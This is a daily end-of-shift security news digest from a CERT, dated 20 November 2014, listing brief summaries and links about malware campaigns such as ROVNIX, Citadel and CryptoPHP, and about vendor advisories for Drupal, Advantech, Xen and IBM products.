[CERT-daily] Tageszusammenfassung - Donnerstag 20-11-2014

Thu Nov 20 18:14:12 CET 2014

=======================
= End-of-Shift report =
=======================

Timeframe:   Mittwoch 19-11-2014 18:00 − Donnerstag 20-11-2014 18:00
Handler:     Stephan Richter
Co-Handler:  n/a


*** ROVNIX Infects Systems with Password-Protected Macros ***
---------------------------------------------
We recently found that the malware family ROVNIX is capable of being distributed via macro downloader. This malware technique was previously seen in the DRIDEX malware, which was notable for using the same routines. DRIDEX is also known as the successor of the banking malware CRIDEX. Though a fairly old method for infection, cybercriminals realized that using malicious macros work...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/0rtiBt3T3E4/


*** Citadel Variant Targets Password Managers ***
---------------------------------------------
Some Citadel-infected computers have received a new configuration file, a keylogger triggered to go after the master passwords from three leading password management tools.
---------------------------------------------
http://threatpost.com/citadel-variant-targets-password-managers/109493


*** CryptoPHP: Analysis of a hidden threat inside popular content management systems ***
---------------------------------------------
CryptoPHP is a threat that uses backdoored Joomla, WordPress and Drupal themes and plug-ins to compromise webservers on a large scale. By publishing pirated themes and plug-ins free for anyone to use instead of having to pay for them, the CryptoPHP actor is social engineering site administrators into installing the included backdoor on their server.
---------------------------------------------
http://blog.fox-it.com/2014/11/18/cryptophp-analysis-of-a-hidden-threat-inside-popular-content-management-systems/


*** An inside look: gathering and analyzing the SIR data ***
---------------------------------------------
At the Microsoft Malware Protection Center, threat data is a critical source of information to help protect our customers. We use it to understand what's going on in the overall malware ecosystem, determine the best way to protect our customers, and find the most effective way to deliver that protection. We also use the data to produce a number of reports to help our customers. This includes our bi-annual Security Intelligence Report (SIR). This blog post gives you a behind-the-scenes...
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2014/11/19/an-inside-look-gathering-and-analyzing-the-sir-data.aspx


*** Annual Privacy Forum 2014 materials and APF2015 - Call for partnership ***
---------------------------------------------
ENISA's Information Security and Data Protection Unit announces the commencement of preparations for the Annual Privacy Forum of 2015.
---------------------------------------------
http://www.enisa.europa.eu/media/news-items/annual-privacy-forum-2014-materials-and-apf2015-call-for-partnership


*** Electronic Arts: Datenpanne bei Origin ***
---------------------------------------------
Einblicke in persönliche Daten von anderen Nutzern zeigt derzeit Origin, das Onlineportal von Electronic Arts, beim Zugriff auf die Foren an.
---------------------------------------------
http://www.golem.de/news/electronic-arts-datenpanne-bei-origin-1411-110689-rss.html


*** How Splitting A Computer Into Multiple Realities Can Protect You From Hackers ***
---------------------------------------------
Eight years ago, polish hacker Joanna Rutkowska was experimenting with rootkits - tough-to-detect spyware that infects the deepest level of a computer's operating system - when she came up with a devious notion: What if, instead of putting spyware inside a victim's computer, you put the victim's computer inside the spyware? At the time, a technology known...
---------------------------------------------
http://feeds.wired.com/c/35185/f/661467/s/40ab9794/sc/4/l/0L0Swired0N0C20A140C110Cprotection0Efrom0Ehackers0C/story01.htm


*** Vulnerabilities identified in three Advantech products ***
---------------------------------------------
Researchers with Core Security have identified vulnerabilities in three products manufactured by Advantech, some of which can be exploited remotely.
---------------------------------------------
http://www.scmagazine.com/vulnerabilities-identified-in-three-advantech-products/article/384265/


*** Bugtraq: [CORE-2014-0009] - Advantech EKI-6340 Command Injection ***
---------------------------------------------
http://www.securityfocus.com/archive/1/534021


*** Bugtraq: [CORE-2014-0008] - Advantech AdamView Buffer Overflow ***
---------------------------------------------
http://www.securityfocus.com/archive/1/534022


*** Bugtraq: [CORE-2014-0010] - Advantech WebAccess Stack-based Buffer Overflow ***
---------------------------------------------
http://www.securityfocus.com/archive/1/534023


*** Drupal Patches Denial of Service Vulnerability; Details Disclosed ***
---------------------------------------------
Drupal has released a patched a denial of service and account hijacking vulnerability, details of which were disclosed by the researchers who discovered the issue.
---------------------------------------------
http://threatpost.com/drupal-patches-denial-of-service-vulnerability-details-disclosed/109502


*** Drupal Core - Moderately Critical - Multiple Vulnerabilities - SA-CORE-2014-006 ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CORE-2014-006Project: Drupal core Version: 6.x, 7.xDate: 2014-November-19Security risk: 14/25 ( Moderately Critical) AC:Basic/A:None/CI:Some/II:Some/E:Theoretical/TD:UncommonVulnerability: Multiple vulnerabilitiesDescriptionSession hijacking (Drupal 6 and 7)A specially crafted request can give a user access to another users session, allowing an attacker to hijack a random session.This attack is known to be possible on certain Drupal 7 sites which serve both HTTP and HTTPS...
---------------------------------------------
https://www.drupal.org/SA-CORE-2014-006


*** DRUPAL Security Advisories for Third-Party Modules ***
---------------------------------------------
https://www.drupal.org/node/2378287
https://www.drupal.org/node/2378279
https://www.drupal.org/node/2378441
https://www.drupal.org/node/2378401
https://www.drupal.org/node/2378367


*** R7-2014-18: Hikvision DVR Devices - Multiple Vulnerabilities ***
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities


*** Paid Memberships Pro plugin for WordPress getfile.php directory traversal ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/98805


*** Lsyncd default-rsyncssh.lua command execution ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/98806


*** Security Advisory-App Validity Check Bypass Vulnerability in Huawei P7 Smartphone ***
---------------------------------------------
Nov 20, 2014 14:53
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-397472.htm


*** Vuln: MantisBT core/file_api.php Security Bypass Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/71104


*** Xen Security Advisory 113 - Guest effectable page reference leak in MMU_MACHPHYS_UPDATE handling ***
---------------------------------------------
An error handling path in the processing of MMU_MACHPHYS_UPDATE failed to drop a page reference which was acquired in an earlier processing step.
---------------------------------------------
http://lists.xen.org/archives/html/xen-announce/2014-11/msg00003.html


*** IBM Security Network Protection Shell Command Injection ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/98519


*** IBM Security Bulletins related to POODLE ***
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_vulnerability_in_sslv3_affects_ibm_infosphere_master_data_management_cve_2014_3566?lang=en_us
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_vulnerability_in_sslv3_affects_ibm_connections_cve_2014_3566?lang=en_us
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_vulnerability_in_sslv3_affects_host_on_demand_cve_2014_3566?lang=en_us
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_vulnerability_in_sslv3_affects_ibm_business_monitor_cve_2014_3566?lang=en_us


*** Other IBM Security Bulletins ***
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_fix_available_for_security_vulnerabilities_in_ckeditor_that_affect_ibm_inotes_9_0_1_x_cve_2014_5191?lang=en_us
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_vulnerabilities_in_openssl_affect_ibm_infosphere_master_data_management_cve_2014_3513_cve_2014_3567?lang=en_us